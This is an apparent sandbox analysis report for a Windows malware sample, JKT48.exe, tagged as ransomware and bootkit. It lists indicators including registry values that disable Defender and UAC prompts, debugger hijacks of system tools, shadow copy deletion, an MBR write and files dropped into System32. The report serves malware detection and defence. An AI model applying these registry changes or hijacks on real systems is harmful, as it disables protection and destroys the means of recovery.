9b495506295d895825ddf2a45c28f704debc31f28c4943b1a78b75c898a4375d

Resubmissions

28/03/2025, 14:59

250328-sc4wsazjx2 10

28/03/2025, 14:53

250328-r9rr2sxwbz 10

27/03/2025, 13:35

250327-qvr9laswew 10

Analysis

max time kernel
56s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
27/03/2025, 13:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JKT48.exe
Size

8.0MB
MD5

41f5bac802f5e79dc2ca7a3db25d0001
SHA1

ce56c42cadd2db13edf03c15ce3b11c2cfa00f9e
SHA256

9b495506295d895825ddf2a45c28f704debc31f28c4943b1a78b75c898a4375d
SHA512

94705e83ce1b104954be07210ea3648c7403a6dd86ebaf6e884ced1552636b6a05a3b2926415d6c49ff251a675815435e4b2a3c8f816bbbf68c08c3299db99ab
SSDEEP

196608:PF35AX/ip4e/aS3e+gr80KILDjhoOX9oeqZ8r8swzH0e:d3KX/o4eSTr80xHhJ8s63

Score

10^/10

bootkit defense_evasion discovery evasion execution exploit impact persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	JKT48.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	JKT48.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Disables RegEdit via registry modification 1 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	JKT48.exe

Disables Task Manager via registry modification
defense_evasion
Disables use of System Restore points 1 TTPs
defense_evasion

Inhibit System Recovery
T1490

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 32 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe\Debugger = "*/"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
3684	Process not Found
3184	takeown.exe
3412	icacls.exe
2408	takeown.exe
3972	Process not Found
6140	Process not Found
6012	Process not Found
4816	Process not Found
5880	Process not Found
2376	icacls.exe
5172	Process not Found
5752	Process not Found
764	Process not Found
5636	icacls.exe
956	takeown.exe
5736	Process not Found
6112	icacls.exe
5264	takeown.exe
5460	Process not Found
5132	Process not Found
5808	Process not Found
5676	Process not Found
644	icacls.exe
296	takeown.exe
3168	takeown.exe
5808	Process not Found
2884	icacls.exe
5936	Process not Found
3296	Process not Found
4368	takeown.exe
4512	takeown.exe
5532	Process not Found
1708	takeown.exe
2172	icacls.exe
5772	icacls.exe
5316	Process not Found
1548	Process not Found
4388	takeown.exe
5136	Process not Found
5024	icacls.exe
5388	Process not Found
6036	Process not Found
3904	Process not Found
1736	icacls.exe
1804	icacls.exe
5000	takeown.exe
4888	icacls.exe
3840	icacls.exe
5236	Process not Found
5460	Process not Found
4352	Process not Found
2112	takeown.exe
2376	icacls.exe
5768	Process not Found
232	Process not Found
4472	Process not Found
4308	icacls.exe
3028	icacls.exe
1756	Process not Found
6140	Process not Found
6124	Process not Found
3456	Process not Found
2880	takeown.exe
2904	takeown.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	JKT48.exe

Loads dropped DLL 1 IoCs

pid	Process
4476	Process not Found

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4508	takeown.exe
1112	icacls.exe
4676	takeown.exe
5664	Process not Found
3620	Process not Found
1756	Process not Found
5984	Process not Found
1256	takeown.exe
5664	Process not Found
1900	Process not Found
2928	takeown.exe
3008	icacls.exe
3944	takeown.exe
5220	Process not Found
3784	icacls.exe
1900	Process not Found
4116	takeown.exe
4808	icacls.exe
300	takeown.exe
5428	Process not Found
5380	Process not Found
5832	Process not Found
1492	takeown.exe
956	icacls.exe
5448	takeown.exe
4480	Process not Found
3120	Process not Found
5232	Process not Found
2484	icacls.exe
3788	Process not Found
6100	Process not Found
3784	icacls.exe
1628	icacls.exe
3856	Process not Found
5424	Process not Found
3116	icacls.exe
5980	icacls.exe
5440	Process not Found
5400	Process not Found
6024	Process not Found
1900	Process not Found
5916	Process not Found
5676	Process not Found
1980	icacls.exe
5820	Process not Found
5740	Process not Found
6004	Process not Found
5392	Process not Found
6116	Process not Found
1496	Process not Found
3760	icacls.exe
1372	icacls.exe
5476	Process not Found
4432	Process not Found
5292	Process not Found
5108	icacls.exe
2864	icacls.exe
3972	Process not Found
6132	Process not Found
3964	icacls.exe
1040	icacls.exe
3388	icacls.exe
5836	Process not Found
1916	Process not Found

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	JKT48.exe

Drops file in System32 directory 29 IoCs

description	ioc	Process
File created	C:\windows\system32\perfmon.exe	JKT48.exe
File created	C:\windows\system32\resmon.exe	JKT48.exe
File created	C:\windows\system32\rstrui.exe	JKT48.exe
File created	C:\windows\system32\winload.exe	JKT48.exe
File created	C:\windows\syswow64\cmd.exe	JKT48.exe
File created	C:\windows\syswow64\taskmgr.exe	JKT48.exe
File created	C:\windows\system32\logonui.exe	JKT48.exe
File created	C:\windows\syswow64\reg.exe	JKT48.exe
File created	C:\windows\syswow64\sethc.exe	JKT48.exe
File created	C:\windows\syswow64\sfc.exe	JKT48.exe
File created	C:\windows\system32\hal.dll	JKT48.exe
File created	C:\windows\syswow64\regedit.exe	JKT48.exe
File created	C:\windows\syswow64\taskkill.exe	JKT48.exe
File created	C:\windows\syswow64\rundll32.exe	JKT48.exe
File created	C:\windows\system32\taskmgr.exe	JKT48.exe
File created	C:\windows\syswow64\perfmon.exe	JKT48.exe
File created	C:\windows\syswow64\perfmon.msc	JKT48.exe
File created	C:\windows\system32\reg.exe	JKT48.exe
File created	C:\windows\system32\rundll32.exe	JKT48.exe
File created	C:\windows\syswow64\utilman.exe	JKT48.exe
File created	C:\windows\syswow64\resmon.exe	JKT48.exe
File created	C:\windows\system32\utilman.exe	JKT48.exe
File created	C:\windows\system32\sethc.exe	JKT48.exe
File created	C:\windows\system32\perfmon.msc	JKT48.exe
File created	C:\windows\system32\msconfig.exe	JKT48.exe
File created	C:\windows\system32\taskkill.exe	JKT48.exe
File created	C:\windows\system32\ntoskrnl.exe	JKT48.exe
File created	C:\windows\system32\sfc.exe	JKT48.exe
File created	C:\windows\system32\cmd.exe	JKT48.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\422291703	JKT48.exe
File created	C:\Program Files\Java\jdk-1.8\bin\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\133.0.6943.60\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\Addons\RCX138F.tmp	JKT48.exe
File opened for modification	C:\Program Files\7-Zip\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\681585162	JKT48.exe
File opened for modification	C:\Program Files\dotnet\49945062	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\dotnet\49945062	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\RCX972F.tmp	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Source Engine\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Microsoft Office\root\Integration\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\RCX9CA0.tmp	JKT48.exe
File created	C:\Program Files\Microsoft Office\Office16\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\OFFICE16\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\RCXD586.tmp	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\RCXDA7C.tmp	JKT48.exe
File opened for modification	C:\Program Files\Internet Explorer\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\Addons\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\RCX9740.tmp	JKT48.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\RCXD587.tmp	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\MSInfo\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\OFFICE16\681585162	JKT48.exe
File opened for modification	C:\Program Files\dotnet\RCXB7DA.tmp	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\422291703	JKT48.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Microsoft Office\root\Integration\Addons\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\691216923	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\MSInfo\159254014	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\RCX9CB0.tmp	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\RCXD78C.tmp	JKT48.exe
File created	C:\Program Files\Java\jre-1.8\bin\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\RCXB7DB.tmp	JKT48.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Internet Explorer\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Microsoft Office\root\Office16\65523778	JKT48.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\RCX1E9E.tmp	JKT48.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\Addons\RCX1390.tmp	JKT48.exe
File opened for modification	C:\Program Files\dotnet\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Microsoft Office\root\Office16\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\317354143	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\133.0.6943.60\691216923	JKT48.exe
File opened for modification	C:\Program Files\Microsoft Office\Office16\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Microsoft Office\root\Integration\Addons\420603874	JKT48.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\windows\regedit.exe	JKT48.exe
File created	C:\windows\servicing\trustedinstaller.exe	JKT48.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2000	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 45 IoCs

pid	Process
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3604	JKT48.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3604	JKT48.exe
Token: SeDebugPrivilege	3604	JKT48.exe
Token: SeIncBasePriorityPrivilege	3604	JKT48.exe
Token: SeTakeOwnershipPrivilege	1924	takeown.exe
Token: SeTakeOwnershipPrivilege	2864	takeown.exe
Token: SeTakeOwnershipPrivilege	3492	takeown.exe
Token: SeTakeOwnershipPrivilege	4116	takeown.exe
Token: SeTakeOwnershipPrivilege	1708	takeown.exe
Token: SeTakeOwnershipPrivilege	3816	takeown.exe
Token: SeTakeOwnershipPrivilege	2832	takeown.exe
Token: SeTakeOwnershipPrivilege	4140	takeown.exe
Token: SeTakeOwnershipPrivilege	3472	takeown.exe
Token: SeTakeOwnershipPrivilege	4664	takeown.exe
Token: SeTakeOwnershipPrivilege	776	takeown.exe
Token: SeTakeOwnershipPrivilege	3296	takeown.exe
Token: SeTakeOwnershipPrivilege	4308	takeown.exe
Token: SeTakeOwnershipPrivilege	1780	takeown.exe
Token: SeTakeOwnershipPrivilege	3180	takeown.exe
Token: SeTakeOwnershipPrivilege	5084	takeown.exe
Token: SeTakeOwnershipPrivilege	1108	takeown.exe
Token: SeTakeOwnershipPrivilege	5012	takeown.exe
Token: SeTakeOwnershipPrivilege	3520	takeown.exe
Token: SeTakeOwnershipPrivilege	3300	takeown.exe
Token: SeTakeOwnershipPrivilege	4464	takeown.exe
Token: SeTakeOwnershipPrivilege	1220	takeown.exe
Token: SeTakeOwnershipPrivilege	4320	takeown.exe
Token: SeTakeOwnershipPrivilege	4076	takeown.exe
Token: SeTakeOwnershipPrivilege	1328	takeown.exe
Token: SeTakeOwnershipPrivilege	4964	takeown.exe
Token: SeTakeOwnershipPrivilege	4744	takeown.exe
Token: SeTakeOwnershipPrivilege	5108	takeown.exe
Token: SeTakeOwnershipPrivilege	112	takeown.exe
Token: SeTakeOwnershipPrivilege	2112	takeown.exe
Token: SeTakeOwnershipPrivilege	1712	takeown.exe
Token: SeTakeOwnershipPrivilege	508	takeown.exe
Token: SeTakeOwnershipPrivilege	3884	takeown.exe
Token: SeTakeOwnershipPrivilege	4444	takeown.exe
Token: SeTakeOwnershipPrivilege	2708	takeown.exe
Token: SeTakeOwnershipPrivilege	2108	takeown.exe
Token: SeTakeOwnershipPrivilege	872	takeown.exe
Token: SeTakeOwnershipPrivilege	3296	takeown.exe
Token: SeTakeOwnershipPrivilege	3716	takeown.exe
Token: SeTakeOwnershipPrivilege	4740	takeown.exe
Token: SeTakeOwnershipPrivilege	2216	takeown.exe
Token: SeTakeOwnershipPrivilege	2384	takeown.exe
Token: SeTakeOwnershipPrivilege	1112	takeown.exe
Token: SeTakeOwnershipPrivilege	3164	takeown.exe
Token: SeTakeOwnershipPrivilege	1716	takeown.exe
Token: SeTakeOwnershipPrivilege	1140	takeown.exe
Token: SeTakeOwnershipPrivilege	4076	takeown.exe
Token: SeTakeOwnershipPrivilege	2764	takeown.exe
Token: SeTakeOwnershipPrivilege	4452	takeown.exe
Token: SeTakeOwnershipPrivilege	3184	takeown.exe
Token: SeTakeOwnershipPrivilege	2884	takeown.exe
Token: SeTakeOwnershipPrivilege	3784	takeown.exe
Token: SeTakeOwnershipPrivilege	4116	takeown.exe
Token: SeTakeOwnershipPrivilege	4888	takeown.exe
Token: SeTakeOwnershipPrivilege	4540	takeown.exe
Token: SeTakeOwnershipPrivilege	4084	takeown.exe
Token: SeTakeOwnershipPrivilege	4900	takeown.exe
Token: SeTakeOwnershipPrivilege	100	takeown.exe
Token: SeTakeOwnershipPrivilege	4508	takeown.exe
Token: SeTakeOwnershipPrivilege	2764	takeown.exe
Token: SeTakeOwnershipPrivilege	4388	takeown.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe
3604	JKT48.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3604 wrote to memory of 400	3604	JKT48.exe	87
PID 3604 wrote to memory of 400	3604	JKT48.exe	87
PID 3604 wrote to memory of 8	3604	JKT48.exe	89
PID 3604 wrote to memory of 8	3604	JKT48.exe	89
PID 3604 wrote to memory of 4736	3604	JKT48.exe	91
PID 3604 wrote to memory of 4736	3604	JKT48.exe	91
PID 3604 wrote to memory of 1780	3604	JKT48.exe	93
PID 3604 wrote to memory of 1780	3604	JKT48.exe	93
PID 3604 wrote to memory of 724	3604	JKT48.exe	95
PID 3604 wrote to memory of 724	3604	JKT48.exe	95
PID 3604 wrote to memory of 2112	3604	JKT48.exe	97
PID 3604 wrote to memory of 2112	3604	JKT48.exe	97
PID 3604 wrote to memory of 4176	3604	JKT48.exe	99
PID 3604 wrote to memory of 4176	3604	JKT48.exe	99
PID 3604 wrote to memory of 1924	3604	JKT48.exe	101
PID 3604 wrote to memory of 1924	3604	JKT48.exe	101
PID 3604 wrote to memory of 1668	3604	JKT48.exe	103
PID 3604 wrote to memory of 1668	3604	JKT48.exe	103
PID 3604 wrote to memory of 4820	3604	JKT48.exe	105
PID 3604 wrote to memory of 4820	3604	JKT48.exe	105
PID 3604 wrote to memory of 3048	3604	JKT48.exe	107
PID 3604 wrote to memory of 3048	3604	JKT48.exe	107
PID 3604 wrote to memory of 3972	3604	JKT48.exe	110
PID 3604 wrote to memory of 3972	3604	JKT48.exe	110
PID 3604 wrote to memory of 4132	3604	JKT48.exe	112
PID 3604 wrote to memory of 4132	3604	JKT48.exe	112
PID 3604 wrote to memory of 648	3604	JKT48.exe	115
PID 3604 wrote to memory of 648	3604	JKT48.exe	115
PID 3604 wrote to memory of 2864	3604	JKT48.exe	117
PID 3604 wrote to memory of 2864	3604	JKT48.exe	117
PID 3604 wrote to memory of 1948	3604	JKT48.exe	119
PID 3604 wrote to memory of 1948	3604	JKT48.exe	119
PID 3604 wrote to memory of 3492	3604	JKT48.exe	121
PID 3604 wrote to memory of 3492	3604	JKT48.exe	121
PID 3604 wrote to memory of 3420	3604	JKT48.exe	123
PID 3604 wrote to memory of 3420	3604	JKT48.exe	123
PID 3604 wrote to memory of 4116	3604	JKT48.exe	125
PID 3604 wrote to memory of 4116	3604	JKT48.exe	125
PID 3604 wrote to memory of 4320	3604	JKT48.exe	127
PID 3604 wrote to memory of 4320	3604	JKT48.exe	127
PID 3604 wrote to memory of 1708	3604	JKT48.exe	131
PID 3604 wrote to memory of 1708	3604	JKT48.exe	131
PID 3604 wrote to memory of 3456	3604	JKT48.exe	133
PID 3604 wrote to memory of 3456	3604	JKT48.exe	133
PID 3604 wrote to memory of 100	3604	JKT48.exe	135
PID 3604 wrote to memory of 100	3604	JKT48.exe	135
PID 3604 wrote to memory of 3816	3604	JKT48.exe	137
PID 3604 wrote to memory of 3816	3604	JKT48.exe	137
PID 3604 wrote to memory of 4924	3604	JKT48.exe	139
PID 3604 wrote to memory of 4924	3604	JKT48.exe	139
PID 3604 wrote to memory of 5048	3604	JKT48.exe	141
PID 3604 wrote to memory of 5048	3604	JKT48.exe	141
PID 3604 wrote to memory of 3192	3604	JKT48.exe	143
PID 3604 wrote to memory of 3192	3604	JKT48.exe	143
PID 3604 wrote to memory of 1400	3604	JKT48.exe	145
PID 3604 wrote to memory of 1400	3604	JKT48.exe	145
PID 3604 wrote to memory of 4972	3604	JKT48.exe	147
PID 3604 wrote to memory of 4972	3604	JKT48.exe	147
PID 3604 wrote to memory of 2588	3604	JKT48.exe	149
PID 3604 wrote to memory of 2588	3604	JKT48.exe	149
PID 3604 wrote to memory of 2832	3604	JKT48.exe	152
PID 3604 wrote to memory of 2832	3604	JKT48.exe	152
PID 3604 wrote to memory of 2248	3604	JKT48.exe	154
PID 3604 wrote to memory of 2248	3604	JKT48.exe	154

System policy modification 1 TTPs 1 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	JKT48.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\JKT48.exe
"C:\Users\Admin\AppData\Local\Temp\JKT48.exe"
1⤵
- Modifies Windows Defender DisableAntiSpyware settings
- UAC bypass
- Disables RegEdit via registry modification
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
